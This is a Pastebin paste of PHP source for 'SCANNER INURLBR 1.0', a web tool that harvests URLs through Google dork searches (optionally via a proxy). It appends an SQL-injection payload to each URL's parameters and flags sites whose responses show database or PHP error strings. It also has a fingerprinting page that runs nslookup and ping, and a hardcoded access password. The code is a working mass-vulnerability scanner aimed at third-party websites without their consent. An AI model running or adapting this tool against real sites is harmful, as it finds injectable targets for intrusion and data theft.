daily pastebin goal
64%
SHARE
TWEET

BOT - SCANNER PRIV8 / - INURLBR

Googleinurl Sep 13th, 2013 3,047 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. /*
  3.   ##########################################################################################
  4.  *  SCANNER INURLBR     1.0
  5.  *  PHP Version         5.4.7
  6.  *  php5-curl           LIB
  7.  *  cURL support        enabled
  8.  *  cURL Information    7.24.0
  9.  *  Apache              2.4
  10.  *  allow_url_fopen =   On
  11.  *  Motor de busca      GOOGLE
  12.  *  Permissão            Leitura & Escrita
  13.  *  -------------------------------------------------------------------------------------
  14.  *  BUSCA POSSÍVEIS VULNERABILIDADES
  15.  *  SQLI(MySQL,MS ACCESS,Microsoft SQL Server,ORACLE,POSTGRESQL) OU ERROS DE PROGRAMAÇÃO.
  16.  *  
  17.  *  GRUPO GOOGLEINURL BRASIL - PESQUISA AVANÇADA.
  18.  *  fb.com/GoogleINURL
  19.  *  twitter.com/GoogleINURL
  20.  *  blog.inurl.com.br
  21.   ##########################################################################################
  22.  */
  23.  
  24. $googleHost = "www.google.com.br www.google.pt www.google.com.bo www.google.com.my www.google.ru
  25. www.google.co.jp www.google.com.ar www.google.es www.google.it www.google.co.uk
  26. www.google.com www.google.ac www.google.ad www.google.ae www.google.com.af
  27. www.google.com.ag www.google.com.ai www.google.am www.google.it.ao www.google.com.ar
  28. www.google.as www.google.at www.google.com.au www.google.az www.google.ba www.google.com.bd
  29. www.google.be www.google.bf www.google.bg www.google.com.bh www.google.bi www.google.bj
  30. www.google.com.bn www.google.com.bo www.google.com.br www.google.bs www.google.co.bw
  31. www.google.com.by www.google.com.bz www.google.ca www.google.com.kh www.google.cc
  32. www.google.cd www.google.cf www.google.cat www.google.cg www.google.ch www.google.ci
  33. www.google.co.ck www.google.cl www.google.cm www.google.cn www.google.com.co www.google.co.cr
  34. www.google.com.cu www.google.cv www.google.cz www.google.de www.google.dj www.google.dk www.google.dm
  35. www.google.com.do www.google.dz www.google.com.ec www.google.ee www.google.com.eg www.google.es
  36. www.google.com.et www.google.fi www.google.com.fj www.google.fm www.google.fr www.google.ga
  37. www.google.ge www.google.gf www.google.gg www.google.com.gh www.google.com.gi www.google.gl
  38. www.google.gm www.google.gp www.google.gr www.google.com.gt www.google.gy www.google.com.hk
  39. www.google.hn www.google.hr www.google.ht www.google.hu www.google.co.id www.google.iq
  40. www.google.ie www.google.co.il www.google.im www.google.co.in www.google.io www.google.is
  41. www.google.it www.google.je www.google.com.jm www.google.jo www.google.co.jp www.google.co.ke
  42. www.google.ki www.google.kg www.google.co.kr www.google.com.kw www.google.kz www.google.la
  43. www.google.com.lb www.google.com.lc www.google.li www.google.lk www.google.co.ls www.google.lt
  44. www.google.lu www.google.lv www.google.com.ly www.google.co.ma www.google.md www.google.me
  45. www.google.mg www.google.mk www.google.ml www.google.mn www.google.ms www.google.com.mt
  46. www.google.mu www.google.mv www.google.mw www.google.com.mx www.google.com.my www.google.co.mz
  47. www.google.com.na www.google.ne www.google.com.nf www.google.com.ng www.google.com.ni www.google.nl
  48. www.google.no www.google.com.np www.google.nr www.google.nu www.google.co.nz www.google.com.om
  49. www.google.com.pa www.google.com.pe www.google.com.ph www.google.com.pk www.google.pn
  50. www.google.com.pr www.google.ps www.google.pt www.google.com.py www.google.com.qa www.google.ro
  51. www.google.rs www.google.ru www.google.rw www.google.com.sa www.google.com.sb www.google.sc
  52. www.google.se www.google.com.sg www.google.sh www.google.si www.google.sk www.google.com.sl
  53. www.google.sn www.google.sm www.google.so www.google.st www.google.com.sv www.google.td
  54. www.google.tg www.google.co.th www.google.tk www.google.tl www.google.tm www.google.to www.google.com.tn
  55. www.google.com.tr www.google.tt www.google.com.tw www.google.co.tz www.google.com.ua www.google.co.ug
  56. www.google.co.uk www.google.us www.google.com.uy www.google.co.uz www.google.com.vc www.google.co.ve
  57. www.google.vg www.google.co.vi www.google.com.vn www.google.vu www.google.ws www.google.co.za
  58. www.google.co.zm www.google.co.zw ";
  59. $googleHost = explode(" ", $googleHost);
  60.  
  61.  
  62.  
  63.  
  64. error_reporting(0);
  65. set_time_limit(0);
  66. ini_set('memory_limit', '64M');
  67. ini_set("max_execution_time", 0);
  68. ini_set("allow_url_fopen", 1);
  69. ini_set("default_socket_timeout", 5);
  70. header('Content-Type: text/html; charset=UTF-8');
  71.  
  72. if (!isset($_SESSION)) {
  73.     session_start();
  74. }
  75. if (isset($_GET['senha']) && $_GET['senha'] == 'googleinurl') { // VALIDANDO SENHA:googleinurl
  76.     $_SESSION['valida'] = 1; //SETANDO O VALIDADOR DA PAGINA
  77. }
  78. if ($_SESSION['valida'] != 1) { // SE _SESSION VALIDA for diferente de 1 ele não deixa pagina ser carregada
  79.     echo 'SEM ACESSO!';
  80.     unset($_SESSION['valida']);
  81.     EXIT();
  82. }
  83. if (isset($_GET['sair']) && $_GET['sair'] == 'ok') { //SAIR DO SISTEMA
  84.     unset($_SESSION['valida']);
  85.     session_destroy();
  86.     EXIT();
  87. }
  88. if (preg_match('|MSIE ([0-9].[0-9]{1,2})|', $_SERVER['HTTP_USER_AGENT'])) {
  89.     echo "<h1 style='text-size:14px;text-align:center;'>Favor usar um navegador que preste!</br>Please use a browser that pay!<br>
  90.          <img src='http://1.bp.blogspot.com/_0MpBNlJrdds/TU0x2KYVbQI/AAAAAAAAAbM/ryjvYAy32K4/s320/Fuck%2BYou.png'></h1>";
  91.     EXIT();
  92. }
  93.  
  94. function plus() {
  95.     ob_flush();
  96.     flush();
  97. }
  98.  
  99. function nslookup($dominio, $op) {
  100.     system("nslookup -querytype={$op} " . escapeshellarg($dominio), $dados);
  101.  
  102.     if ($dados[0] == '') {
  103.         print_r("$op Sem informações\n");
  104.         return FALSE;
  105.     }
  106.     return print_r($dados);
  107. }
  108.  
  109. function ping($dominio) {
  110.     $comando = (strstr(PHP_OS, 'LINUX') ? '-c 4' : NULL);
  111.     system("ping {$comando} " . escapeshellarg($dominio), $dados);
  112.  
  113.     if ($dados[0] == '') {
  114.         print_("$op Sem informações\n");
  115.         return FALSE;
  116.     }
  117.     return print_r($dados);
  118. }
  119.  
  120. $stylePags = "<link href='http://fonts.googleapis.com/css?family=Aldrich' rel='stylesheet' type='text/css'>
  121.    <style>
  122.      body
  123.        {
  124.            background-color:#000000;
  125.            background-repeat: no-repeat;
  126.            background-attachment: fixed;
  127.            background-image: url('http://4.bp.blogspot.com/-oshfxKaYckY/Umf7Bn79PKI/AAAAAAAACzE/yGU2KXxqc-k/s1600/Black-Texture-Background.png');
  128.            background-width: 100%;
  129.            background-height: 100%;
  130.            background-size: 100%;
  131.            font-family: 'Aldrich', sans-serif;
  132.            _height: 100%;
  133.            _overflow: auto;
  134.  
  135.  
  136.        }
  137.        h1
  138.        {  
  139.            color:#006400;
  140.            text-align:center;
  141.        }
  142.        info{
  143.            color:#fff;
  144.            text-align:center;
  145.  
  146.        }
  147.        cont{
  148.            color:#900000;
  149.            text-align:center;
  150.  
  151.        }
  152.        vull{
  153.            color:#900000;
  154.  
  155.        }
  156.        campoHttp{
  157.            color:#0066FF;
  158.        }
  159.        valorHttp{
  160.            color:#003399;
  161.        }
  162.  
  163.        p,label
  164.        {
  165.            font-size:15px;
  166.            color:#00FF00;
  167.        }
  168.        a:link, a:visited, a:active {
  169.            text-decoration: none;
  170.            color:#fff;
  171.        }
  172.        a:hover {text-decoration: underline;  
  173.                 color:#fff;
  174.                 font-size:105%;
  175.        }
  176.        ico{
  177.            width: 16px;
  178.            height: 16px;
  179.        }
  180.        .bordas {
  181.            background:#000;
  182.            border-color: #1C1C1C;
  183.            border-width: 1px;
  184.            border-style: solid;
  185.            margin: auto;
  186.            padding:10px;
  187.            -moz-border-radius:7px;
  188.            -webkit-border-radius:7px;
  189.            border-radius:7px;
  190.            opacity:0.75;
  191.            -moz-opacity: 0.75;
  192.            filter: alpha(opacity=75);
  193.        }
  194.        .resultado {
  195.            background:#000;
  196.            background-image: url('http://i.imgur.com/zHNCk2e.gif');
  197.            border-color: #fff;
  198.            border-width: 1px;
  199.            border-style: solid;
  200.            color:#fff;
  201.            margin: auto;
  202.            width: 95%;
  203.            padding:10px;
  204.            -moz-border-radius:7px;
  205.            -webkit-border-radius:7px;
  206.            border-radius:7px;
  207.            opacity:0.85;
  208.            -moz-opacity: 0.85;
  209.            filter: alpha(opacity=85);
  210.  
  211.  
  212.  
  213.        }
  214.        .botao {
  215.            background-color: #000;
  216.            font: 14px Arial, sans-serif;
  217.            color: #006400;
  218.        }
  219.        input {
  220.            background:#000;
  221.            border:1px dashed #006400;
  222.            color: #fff;
  223.            -moz-border-radius:7px;
  224.            -webkit-border-radius:7px;
  225.            border-radius:7px;
  226.        }  
  227.         select {
  228.            background:#000;
  229.            border:1px dashed #006400;
  230.            color: #fff;
  231.            -moz-border-radius:7px;
  232.            -webkit-border-radius:7px;
  233.            border-radius:7px;
  234.        }
  235.  
  236.  
  237.        #menu-vertical{
  238.            position:fixed;
  239.            top:120px;
  240.            overflow:hidden;
  241.        }
  242.  
  243.        </style>";
  244. $desc = "<center>
  245. <p>
  246. <a href='http://blog.inurl.com.br' title='BLOG GOOGLE INURL - BUSCA AVANÇADA' alt='BLOG INURL - BUSCA AVANÇADA'>[ blog.inurl.com.br ] - " . date('d/m/Y H:i:s') . "</a>
  247. </p>
  248. </center>";
  249.  
  250. if ($_GET['comando'] == 'phpinfo') {
  251.     echo $stylePags . "<style>body {background-image: url('https://fbcdn-sphotos-h-a.akamaihd.net/hphotos-ak-prn2/1393784_621123304605061_2072400223_n.jpg');}</style>";
  252.     phpinfo();
  253.     EXIT();
  254. }
  255. if ($_GET['comando'] == 'cript') {
  256.     echo '<form action="bot.php" method="post" align="center">
  257.             <label>CRIT.: <input type="text"  name="achar" size="40"></label>
  258.             <label><input class="botao" type="submit" value="Pesquisar..."></label>
  259.          </form>';
  260.     echo $stylePags;
  261.     EXIT();
  262. }
  263. if ($_GET['comando'] == 'fingeprint') {
  264.     echo $stylePags . "<style>body {background-image: url('https://fbcdn-sphotos-h-a.akamaihd.net/hphotos-ak-prn2/1393784_621123304605061_2072400223_n.jpg');}</style>";
  265.     $valor = (isset($_POST['servidor'])) ? $_POST['servidor'] : NULL;
  266.     echo "<div class='resultado'><form action='bot.php?comando=fingeprint' method='post' align='center' >
  267.             <label>SERVIDOR.: <input type='text'  value='{$valor}' name='servidor' size='40'></label>
  268.             <label><input class='botao' type='submit' value='FINGEPRINT...'></label>
  269.             <div class='resultado'>HOST ou IP Ex:google.com.br ou 190.98.170.158</div>
  270.          </form><pre><div class='resultado'><info>RESULTADO: ";
  271.     if ($valor) {
  272.         echo '<p><info>RESPOSTA HTTP:</info></p><campoHttp>';
  273.         var_dump(get_headers($_POST['servidor'], 1));
  274.         var_dump(infoserver($_POST['servidor'], 1));
  275.         echo '</campoHttp><p><info>NSLOOKUP MX:</info></p><campoHttp>';
  276.         nslookup($_POST['servidor'], "MX");
  277.         echo '</campoHttp><p><info>NSLOOKUP TXT:</info></p><campoHttp>';
  278.         nslookup($_POST['servidor'], "TXT");
  279.         echo '</campoHttp><p><info>NSLOOKUP NS:</info></p><campoHttp>';
  280.         nslookup($_POST['servidor'], "NS");
  281.         echo '</campoHttp><p><info>NSLOOKUP CNAME:</info></p><campoHttp>';
  282.         nslookup($_POST['servidor'], "CNAME");
  283.         echo '<p><info>RESPOSTA PING:</info></p><campoHttp>';
  284.         ping($_POST['servidor']);
  285.         echo '</info></div>';
  286.     }
  287.     EXIT();
  288. }
  289.  
  290. $_SESSION['vull_style'] = NULL;
  291. $_SESSION['resultado_vull'] = NULL;
  292. ?>
  293. <meta http-equiv="Content-Type" content="text/html;charset=utf-8" >
  294. <head>
  295.     <title>SCANNER INURLBR 1.0 - [ blog.inurl.com.br ]</title>
  296.  
  297.     <?php echo $stylePags; ?>
  298.  
  299.     <script type="text/javascript">
  300.  
  301.         function popUpCal(url)
  302.         {
  303.             var width = screen.width;
  304.             var height = screen.height;
  305.             var left = parseInt((screen.availWidth / 2) - (width / 2));
  306.             var top = parseInt((screen.availHeight / 2) - (height / 2));
  307.             var windowFeatures = "width=1000,height=1000,scrollbars=1,status=0,resizable=1,left=" + left + ",top=" + top +
  308.                     "screenX=" + left + ",screenY=" + top + "";
  309.  
  310.             window.open(url + "&w=" + width + "&h=" + height, "", windowFeatures, "GET");
  311.         }
  312.     </script>
  313. </head>
  314. <body >
  315. <center>
  316.     <img src='http://2.bp.blogspot.com/-yETqu9tdT50/UlhxshIXcUI/AAAAAAAACus/kYGP_3pXpTs/s1600/logo.png' style='height: 250px;'/><br>
  317.     <?php echo $desc; ?>
  318.  
  319. </center>
  320.  
  321. <div class='resultado' >
  322.  
  323.     <form action="bot.php" method="post">
  324.         <label>*DORK...: <input type="text" value='<?php echo isset($_POST['dork']) ? $_POST['dork'] : NULL; ?>'  name="dork" size="55"></label>
  325.         <label>PROXY..:  <input type="text" value='<?php echo isset($_POST['proxy']) ? $_POST['proxy'] : NULL; ?>' name="proxy" size="15"></label>
  326.         <label>PORTA..:  <input type="text" value='<?php echo isset($_POST['porta']) ? $_POST['porta'] : NULL; ?>' name="porta" size="9"></label> /
  327.         <label><input class="botao" type="submit" value="Pesquisar..."></label>
  328.         <label>HOST GOOGLE..:
  329.             <?php
  330.             echo '<select name="googleHost">';
  331.             foreach ($googleHost as $key => $value) {
  332.                 $selct = ($value == $_POST['googleHost']) ? 'selected' : NULL;
  333.                 echo (isset($value)) ? "<option value='{$value}' {$selct}>{$value}</option>" : NULL;
  334.             }
  335.             echo '</select>';
  336.             ?>
  337.         </label>
  338.         <label><a href="bot.php?sair=ok" style='margin:10px;'>(x)</a></label>
  339.         <p>
  340.             <label>*ARQUIVO SAÍDA.: <input type="text" value='<?php echo isset($_POST['arquivo']) ? $_POST['arquivo'] : 'resultados.txt'; ?>' name="arquivo" size="30"></label>
  341.             <label>0xEXPL01T.: <input type="text" value="<?php echo isset($_POST['exploit']) ? $_POST['exploit'] : "'0x272D2D3B"; ?>" name="exploit" size="40"></label>
  342.             <label>ACHAR ERRO.: <input type="text" value="<?php echo isset($_POST['achar']) ? $_POST['achar'] : NULL; ?>" name="achar" size="40"></label>
  343.         </p>
  344.         <p>
  345.             <label>*BUSCAR ERROS: <input type="radio" name="tipoerro" value="padrao" <?php echo ($_POST['tipoerro'] == 'padrao') ? 'checked' : NULL; ?>>[ PADRÃO ] / </label>
  346.             <label> <input type="radio" name="tipoerro" value="personalizado" <?php echo ($_POST['tipoerro'] == 'personalizado') ? 'checked' : NULL; ?>>[ PERSONALIZADO ]</label>
  347.             <label><a href="#" style='margin:5px;' onclick="javascript:popUpCal('bot.php?comando=phpinfo')"> (INFOPHP) </a></label>
  348.             <label><a href="#" style='margin:5px;' onclick="javascript:popUpCal('bot.php?comando=cript')"></a></label>
  349.             <label><a href="#" style='margin:5px;' onclick="javascript:popUpCal('bot.php?comando=fingeprint')"> (FINGEPRINT) </a></label>
  350.         </p>
  351.     </form>
  352. </div>
  353.  
  354. <div class='resultado' >
  355.     <?php
  356.     $config[] = array();
  357.     $config['dork'] = urlencode(opcao(isset($_POST['dork']) ? $_POST['dork'] : '', "DORK!"));
  358.     $config['host'] = opcao($_POST['googleHost'], "HOST GOOGLE!");
  359.     $config['arquivo'] = opcao($_POST['arquivo'], "ARQUIVO!");
  360.     $config['tipoerro'] = opcao($_POST['tipoerro'], "TIPO DE ERRO!");
  361.     $config['ipProxy'] = (isset($_POST['proxy']) && !empty($_POST['proxy'])) ? $_POST['proxy'] : NULL;
  362.     $config['porta'] = (isset($_POST['porta']) && !empty($_POST['porta'])) ? $_POST['porta'] : NULL;
  363.     echo (!isset($_POST['exploit']) && empty($_POST['exploit'])) ? '<info>EXPLOIT SEM DEFINIÇÃO!</info>' : NULL;
  364.  
  365.     $config['url'] = "/search?q={$config['dork']}&num=1500&btnG=Search";
  366.     $config['port'] = 80;
  367.     $config['host'] = trim($config['host']);
  368.     $packet = "GET {$config['url']} HTTP/1.0\r\n";
  369.     $packet.="Host: {$config['host']}\r\n";
  370.     $packet.="Connection: Close\r\n\r\n";
  371.  
  372.     function opcao($valor, $op) {
  373.  
  374.         if (isset($valor) && !empty($valor)) {
  375.  
  376.             return $valor;
  377.         } else {
  378.  
  379.             echo "<info>FALTA DEFINIR..::: {$op}</info>
  380.            {$desc}";
  381.             exit();
  382.         }
  383.     }
  384.  
  385.     function eviarPacote($packet, $config) {
  386.  
  387.         if (isset($config['ipProxy'])) {
  388.             $ock = fsockopen($config['ipProxy'], $config['porta']);
  389.             if (!$ock) {
  390.                 echo "<info>Proxy não responde {$config['ipProxy']} : {$config['porta']}</info>";
  391.                 die;
  392.             }
  393.         } else {
  394.  
  395.             $ock = fsockopen(gethostbyname($config['host']), $config['port']);
  396.             if (!$ock) {
  397.                 echo "<info>Host não responde {$config['host']} : {$config['port']}</info>";
  398.                 die;
  399.             }
  400.         }
  401.  
  402.         fputs($ock, $packet);
  403.         $buffer = NULL;
  404.         while (!feof($ock)) {
  405.             $buffer.=fgets($ock);
  406.         }
  407.         fclose($ock);
  408.         return($buffer);
  409.     }
  410.  
  411.     function infoserver($url_, $op = null) {
  412.  
  413.         $c = curl_init();
  414.         curl_setopt($c, CURLOPT_URL, $url_);
  415.         curl_setopt($c, CURLOPT_USERAGENT, 'Mozilla/5.' . date('s') . '(Windows; U; Windows NT 6.' . date('s') . '; en-US; rv:1.' . date('s') . '.1.2) Gecko/2009072' . date('s') . ' Firefox/3.' . date('s') . '.2 GTB5');
  416.         curl_setopt($c, CURLOPT_HEADER, 1);
  417.         curl_setopt($c, CURLOPT_NOBODY, 0);
  418.         curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
  419.         curl_setopt($c, CURLOPT_SSL_VERIFYPEER, 0);
  420.         curl_setopt($c, CURLOPT_FRESH_CONNECT, 1);
  421.         curl_setopt($c, CURLOPT_VERBOSE, 1);
  422.         curl_setopt($c, CURLOPT_COOKIEFILE, 'cookie.txt');
  423.         curl_setopt($c, CURLOPT_COOKIEJAR, 'cookie.txt');
  424.  
  425.         $corpo = (curl_exec($c));
  426.         $server = curl_getinfo($c);
  427.         $sys = get_headers($url_);
  428.  
  429.         if (isset($corpo)) {
  430.  
  431.             if (isset($op)) {
  432.                 return $server;
  433.             }
  434.  
  435.             $dadoTipoBD = verificaErro($corpo);
  436.             $_SESSION['vull_style'] = (isset($dadoTipoBD) && !empty($dadoTipoBD)) ? 'style="color:#006400;"' : NULL;
  437.             $_SESSION['resultado_vull'].=(isset($dadoTipoBD) && !empty($dadoTipoBD)) ? "|{$url_}" : NULL;
  438.         } else {
  439.  
  440.             return FALSE;
  441.         }
  442.  
  443.         return $info = "
  444.            <campoHttp><img src='http://icons.iconarchive.com/icons/fatcow/farm-fresh/24/counter-icon.png'/>/ HTTP_CODE:</campoHttp>
  445.            <valorHttp>{$server['http_code']}</valorHttp>
  446.            <campoHttp><img src='http://icons.iconarchive.com/icons/fatcow/farm-fresh/24/ip-class-icon.png'/>/ IP SERVER:</campoHttp>
  447.            <valorHttp>{$server['primary_ip']}</valorHttp>  
  448.            <campoHttp><img src='http://icons.iconarchive.com/icons/fatcow/farm-fresh/24/door-in-icon.png'/>/ PORTA SERVER:</campoHttp>
  449.            <valorHttp>{$server['primary_port']}</valorHttp>
  450.            <campoHttp><img src='http://icons.iconarchive.com/icons/fatcow/farm-fresh/24/computer-go-icon.png'/>/ WEB SERVER:</campoHttp>
  451.            <valorHttp>{$sys['2']}</valorHttp><br>
  452.            <vull>{$dadoTipoBD}</vull>
  453.            ";
  454.     }
  455.  
  456.     function formatarResult($html) {
  457.  
  458.         preg_match_all('#\b((((ht|f)tps?://)|(www|ftp)\.)[a-zA-Z0-9\.\#\@\:%_/\?\=\~\-]+)#i', $html, $match);
  459.         $contUrl = 1;
  460.         $contTotal = 0;
  461.         $match[1] = array_unique($match[1]);
  462.         plus();
  463.         for ($i = 0; $i < count($match[1]); $i++) {
  464.  
  465.             if (isset($match[1][$i]) && !strstr($match[1][$i], "google") && !strstr($match[1][$i], "youtube") && !strstr($match[1][$i], "orkut") && !strstr($match[1][$i], "schema") && !strstr($match[1][$i], "blogger")) {
  466.  
  467.                 $info = infoserver(gerarErroDB(urldecode($match[1][$i])));
  468.                 $url = gerarErroDB(urldecode($match[1][$i]));
  469.                 $url = "<a target='_black' href={$url} {$_SESSION['vull_style']}>{$url}</a>";
  470.  
  471.                 echo "<p class='bordas'>
  472.                      <info>[<cont>{$contUrl}</cont>] - </info>  <url>{$url}</url> </br>{$info}
  473.                       </p>";
  474.                 $contUrl++;
  475.                 $contTotal++;
  476.             }
  477.         }
  478.         plus();
  479.         $resultado = (isset($_SESSION['resultado_vull'])) ? $_SESSION['resultado_vull'] : exit();
  480.         $resultado = explode("|", $resultado);
  481.         $contRes = count($resultado) - 1;
  482.         $resultadotxt = NULL;
  483.         $nomeArquivo = "{$_POST['arquivo']}";
  484.         $resultadotxt = base64_decode("U0NBTk5FUiBJTlVSTEJSIDEuMCAtIFsgYmxvZy5pbnVybC5jb20uYnIgXQ==") . " /DATA:" . date("d/m/Y H:i:s") . " /DORK: {$_POST['dork']}  /EXPLOIT: {$_POST['exploit']}\r\nTOTAL VULL:{$contRes}\r\n " . implode("\r\n", $resultado) . "\r\n\r\n";
  485.         $resultado = implode("<br>", $resultado);
  486.  
  487.  
  488.         print_r("<div class='resultado'>
  489.                 <p>TOTAL DE URL's: <info>{$contTotal}</info></p>
  490.                 <p>EXPLOIT USADO: <info>{$_POST['exploit']}</info></p>    
  491.                 <p>DORK: <info>{$_POST['dork']}</info></p>
  492.                  <p>TOTAL DE POSSÍVEIS VULL: <info>{$contRes}</info></p>
  493.                  <p>ARQUIVO COM RESULTADO: <info><a href='{$nomeArquivo}' target='_black'>{$nomeArquivo}</a></info></p>
  494.                  <p>LISTA: </p>
  495.                  <p>{$resultado}<p>
  496.                  </div>");
  497.  
  498.         $_SESSION['resultado_vull'] = NULL;
  499.         $abrirtxt = fopen($nomeArquivo, "a");
  500.         if ($abrirtxt == false) {
  501.             die('Não foi possível criar o arquivo.');
  502.         }
  503.         fwrite($abrirtxt, $resultadotxt);
  504.         fclose($abrirtxt);
  505.     }
  506.  
  507.     function validaBD($html_, $verificar, $bd) {
  508.  
  509.         return (strstr($html_, $verificar)) ? $bd : null;
  510.     }
  511.  
  512.     function verificaErro($html_) {
  513.  
  514.         #ERROS BANCO DE DADOS
  515.        if (isset($_POST['tipoerro']) && $_POST['tipoerro'] == 'padrao') {
  516.             $erro['MYSQL-01'] = 'mysql_';
  517.             $erro['MYSQL-02'] = 'You have an error in your SQL syntax;';
  518.             $erro['MYSQL-03'] = 'Warning: mysql_';
  519.             $erro['MYSQL-04'] = 'function.mysql';
  520.             $erro['MYSQL-05'] = 'MySQL result index';
  521.             $erro['MYSQL-06'] = 'syntax;';
  522.             $erro['MYSQL-07'] = 'MySQL';
  523.  
  524.             $erro['MICROSOFT-01'] = 'Microsoft JET Database';
  525.             $erro['MICROSOFT-02'] = 'ODBC Microsoft Access Driver';
  526.             $erro['MICROSOFT-03'] = '500 - Internal server error';
  527.             $erro['MICROSOFT-04'] = 'Microsoft OLE DB Provider';
  528.             $erro['MICROSOFT-05'] = 'Unclosed quotes';
  529.             $erro['MICROSOFT-06'] = 'ADODB.Command';
  530.             $erro['MICROSOFT-07'] = 'ADODB.Field error';
  531.             $erro['MICROSOFT-08'] = 'Microsoft VBScript';
  532.  
  533.             $erro['ORACLE-01'] = 'Microsoft OLE DB Provider for Oracle';
  534.             $erro['ORACLE-02'] = 'ORA-';
  535.  
  536.             $erro['POSTGRESQL-01'] = 'pg_';
  537.             $erro['POSTGRESQL-02'] = 'Warning: pg_';
  538.             $erro['POSTGRESQL-03'] = 'PostgreSql Error:';
  539.  
  540.             #ERROS PHP
  541.            $erro['ERROPHP-01'] = 'Warning: include';
  542.             $erro['ERROPHP-02'] = 'Fatal error: include';
  543.             $erro['ERROPHP-03'] = 'Warning: require';
  544.             $erro['ERROPHP-04'] = 'Fatal error: require';
  545.             $erro['ERROPHP-05'] = 'ADODB_Exception';
  546.  
  547.             #ERROS ASP
  548.            $erro['ERROASP-01'] = 'Version Information: Microsoft .NET Framework';
  549.             $erro['ERROASP-02'] = "Server.Execute Error";
  550.  
  551.             #ERROS INDEFINIDOS
  552.            $erro['INDEFINIDO-01'] = 'SQL';
  553.             $erro['INDEFINIDO-02'] = 'Fatal error';
  554.             $erro['INDEFINIDO-03'] = 'Warning';
  555.         } else {
  556.  
  557.             $erro['ERRRO-PERSONALIZADO'] = $_POST['achar'];
  558.         }
  559.  
  560.         foreach ($erro as $campo => $valor) {
  561.  
  562.             if (validaBD($html_, $erro[$campo], $campo)) {
  563.                 return("Tipo de erro: {$campo}  -  ERRO: {$erro[$campo]}");
  564.             }
  565.         }
  566.     }
  567.  
  568.     function gerarErroDB($_url) {
  569.  
  570.         $_url = explode("=", $_url);
  571.         $get = max(array_keys($_url));
  572.         $get = $_url[$get];
  573.         $config['exploit'] = (isset($_POST['exploit'])) ? $_POST['exploit'] : NULL;
  574.         return implode("=", str_replace($get, $get . $config['exploit'], $_url));
  575.     }
  576.  
  577.     $html = eviarPacote($packet, $config);
  578.  
  579.     print_r(formatarResult($html));
  580.  
  581.     echo $desc;
  582.     ?>
  583.  
  584. </div>
  585. </body>
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top